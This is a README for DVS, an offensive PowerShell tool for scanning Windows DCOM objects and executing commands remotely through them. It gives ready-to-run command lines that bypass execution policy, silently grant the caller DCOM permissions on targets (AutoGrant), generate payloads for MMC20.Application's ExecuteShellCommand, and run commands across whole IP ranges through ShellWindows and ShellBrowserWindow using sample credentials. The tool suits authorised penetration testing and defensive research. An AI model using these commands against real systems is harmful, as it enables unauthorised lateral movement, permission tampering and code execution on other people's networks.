DVS – D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife

This tool is for testing and educational purposes only. Any other usage for this code is not allowed. Use it at your own risk.
The author bears NO responsibility for the misuse of this tool.
By using this you accept the fact that any damage caused by the use of this tool is your responsibility.

• Remote-Registry access(MS-RRP)
  1. Probe port 445 port in order to interact with the remote registry
  2. Check if the remote-registry is enabled
  3. Interact with the remote registry
  4. If AutoGrant the mode is flagged, check to write permissions. otherwise, check read permissions
• Standard Registry Provider (If remote-registry denied)
  1. Probe port 135 in order to interact with the “Standard Registry Provider” using WMI
  2. Check if the StdRegProv is accessible
  3. Interact with the Standard Registry Provider
  4. If AutoGrant the mode is flagged, check for write permissions, otherwise, check for reading permissions

The DVS tool first checks if principal-identity has access to the remote machine via the following steps:

• Basic actions
  1. Authentication operations (if SkipRegAuth is not flagged)
     1. If credentials are provided, it creates a “net-only” session. otherwise, it will use the current logged-on the session.
     2. Probe registry access.
  2. Check if DCOM feature is enabled
  3. Allow DCOM Access (if AutoGrant flagged), otherwise, fail
  4. Check if the logged-on user/provided user and the groups the user is a member of (Via adsi/WindowsIdentity feature), is granted to interact with the DCOM (via remote registry queries)
  5. Grant permissions (if AutoGrant flagged), otherwise, fail
  6. Resolve domain name from a remote machine using NetBIOS over TCP(Using NetAPI32, or UDP Packet), if it fails it will try using the registry (HKLM or HKCU Hives)
• Invoke-DCOMObjectScan
  1. Interact with DCOM objects
  2. Enumerate the DCOM object and find vulnerable functions
  3. Validate exploitation possibility
  4. Generate execution payloads
  5. Fetch personal information about the vulnerable DCOM object
• Get-ExecutionCommand
  1. Generate execution payloads
• Invoke-ExecutionCommand
  1. Try to interact with DCOM objects
  2. Execute the commands
• Invoke-RegisterRemoteSchema
  1. Try to interact with one of the following DCOM Objects:
     • InternetExplorer.Application – InternetExplorer COM Object
     • {D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E} – Another COMObjects belongs to Internet Explorer
     • {C08AFD90-F2A1-11D1-8455-00A0C91F3880} – ShellBrowserWindow
     • {9BA05972-F6A8-11CF-A442-00A0C90A8F39} – ShellWindows
  2. Register remote schema (e.g. http://)
  3. Configure the schema to execute commands from the schema content
  4. Execute the command

• Security rights analyzer – Analyzing principal-identity rights to access the remote DCOM object
• Remote grant access – Grants logged-on user permissions remotely (In case they were not already granted)
• DCOM Scanner – Scan and analyze remote/local DCOM objects for vulnerable functions that are provided (Patterns and function names must be specified) When the tool detects a vulnerable function, it will check what arguments the function includes and if the function has the ability to execute commands
• DCOM command generator – Generates a PowerShell payload in order to execute on the remote machine
• Report – Generates a CSV report with all the information about the vulnerable DCOM object
• Command Execution – Execute commands through DCOM objects

• Out-of domain to domain
• From inside the domain to another domain-joined machine
• From domain to out-of-domain
• From current-session to another domain-joined machine

• Windows 7 SP1
• Windows 8.1
• Windows 10
• Windows Server 2019

git clone https://github.com/ScorpionesLabs/DVS
powershell -ep bypass
PS> Import-Module .DVS.psm1
PS> Get-Help Invoke-DCOMObjectScan -Detailed  # Get details of the Invoke-DCOMObjectScan command
PS> Get-Help Get-ExecutionCommand -Detailed # Get details of the Get-ExecutionCommand command
PS> Get-Help Invoke-ExecutionCommand -Detailed # Get details of the Invoke-ExecutionCommand command
PS> Get-Help Invoke-RegisterRemoteSchema -Detailed # Get details of the Invoke-RegisterRemoteSchema command

Invoke-DCOMObjectScan function allows you to scan DCOM objects and find vulnerable functions via a list of patterns or exact function names that you included in a file.

• Examples:
  1. Enumerates and Scan MMC20.Application (ProgID) object from the attacker machine to the DC01 host without querying the registry.

        Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipRegAuth -Username "labadministrator" -Password "Aa123456!" -Verbose
     

  Note: The tool will not analyze ACL permissions, and when the tool will success, it will resolve all the information about the object, except the details mentioned on the registry(Like object name, executable file, etc.)

  2. Check whether the MMC20.Application (ProgID) object is accessible from the attacker machine to the DC01 host without first querying and verifying the access list of the DCOM object.

        PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipPermissionChecks -CheckAccessOnly -Verbose
     

  3. Validates whether the MMC20.Application (ProgID) is applicable through 10.211.55.4/24 the range. If exists, the tool will try to enumerate the information about it. (using the currently logged-on user session).

        PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -Hostlist "10.211.55.4/24" -CheckAccessOnly -Verbose
     

  4. Validates if the {00020812-0000-0000-C000-000000000046} CLSID through 10.211.55.4 IP address object exists and accessible. If exists, the tool will resolve the information about it. (By using labadministrator credentials).

        PS> Invoke-DCOMObjectScan -Type Single -ObjectName "{00020812-0000-0000-C000-000000000046}" -Hostlist "10.211.55.4" -CheckAccessOnly -Username "labadministrator" -Password "Aa123456!" -Verbose   
     

  5. Scans all the objects stored on a specified path (e.g. C:UsersUSERNAMEDesktopDVSobjects.txt) through 10.211.55.4 IP address, and finds the function list located in the specified file like vulnerable.txt using the labadministrator credentials with the following configuration:
     Max depth: 4
     Max results: 1 (1 result for each object)
     AutoGrant mode: If we don’t have access to the object or if the DCOM feature is disabled, enable the DCOM feature and perform an automatic grant to the relevant DCOM object.
     Finally, revert the machine to the same state as before the attack.

        PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type List -ObjectListFile "C:UsersUSERNAMEDesktopDVSobjects.txt" -FunctionListFile "C:UsersUSERNAMEDesktopDVSvulnerable.txt" -AutoGrant -Username "labadministrator" -Password "Aa123456!" -Hostlist "10.211.55.4" -MaxResults 1 -Verbose
     

  6. Scans all the objects stored on the available remote machines from the 10.211.55.1/24 range and finds potential vulnerable functions from the list located on the selected file (e.g. C:UsersUSERNAMEDesktopDVSvulnerable.txt), exclude the objects on the selected file (e.g. C:UsersUSERNAMEDesktopDVSexclude.txt), and skip property with the same name on other routes on the same object.
     NOTE: The SkipSameProperyName flag might miss vulnerable functions when there is the same property name with different preferences(Methods/other properties) or different depth chain.

        PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type All  -FunctionListFile "C:UsersUSERNAMEDesktopDVSvulnerable.txt" -ExcludeFileList "C:UsersUSERNAMEDesktopDVSexclude.txt" -Hostlist "10.211.55.1/24" -SkipSameProperyName -Verbose
     

Get-ExecutionCommand function allows generating a PowerShell payload that will interact and execute with the remote DCOM function with the relevant parameters.

• Examples:
  1. Checks if the principal-identity is granted to interact with {00020812-0000-0000-C000-000000000046}CLSID object through 10.211.55.4 ip address using labadministrator credentials, then it will generate the execution command.

        PS> Get-ExecutionCommand -ObjectName "{00020812-0000-0000-C000-000000000046}" -ObjectPath "DDEInitiate" -HostList "10.211.55.4" -Username "labAdministrator" -Password "Aa123456!" -Verbose
     

  2. Checks for DCOM access,
     In case the principal-identity doesn’t have the necessary permissions or the DCOM feature is disabled, the tool will enable the DCOM feature, grants identity access and interacts with MMC20.Application (ProgID) object through 10.211.55.4 ip address using labadministrator credentials, and will generates you the execution command.
     Finally, it will revert the machine to the same state as before the attack.

        PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -Username "labAdministrator" -Password "Aa123456!" -AutoGrant -Verbose
     

  3. Tries to interact with MMC20.Application (ProgID) object through 10.211.55.1/24 range using the current logged-on session without analyzing ACL permissions then it will generate the execution command.

        PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.1/24" -SkipPermissionChecks -Verbose
     

  4. Tries to interact with MMC20.Application (ProgID) object through 10.211.55.4 ip address, without querying the registry.

        PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -SkipRegAuth -Verbose
     

Invoke-ExecutionCommand function allows to the execution of commands via DCOM Object using the logged-on user or provided credentials.

Invoke-RegisterRemoteSchema function allows to executes commands via the following DCOM objects using the logged-on user or provided credentials:

• ShellBrowserWindow
• ShellWindows
• Internet Explorer
• ielowutil.exe

Note: These DCOM-objects doesn’t need any access to local machine hive. they can foothold with any user that can access the remote machine!

• Examples:
  1. Executes cmd /c calc command on 10.211.55.1/24 range using the currently logged-on session, and grant privileges if is needed

        PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.1/24" -Command "cmd /c calc" -AutoGrant -Verbose
     

  2. Executes cmd /c calc command on 10.211.55.4 remote machine using provided credentials

        PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.4" -Command "cmd /c calc" -Username "Administrator" -Password "Aa123456!" -Verbose
     

• Analyze and change firewall rules remotely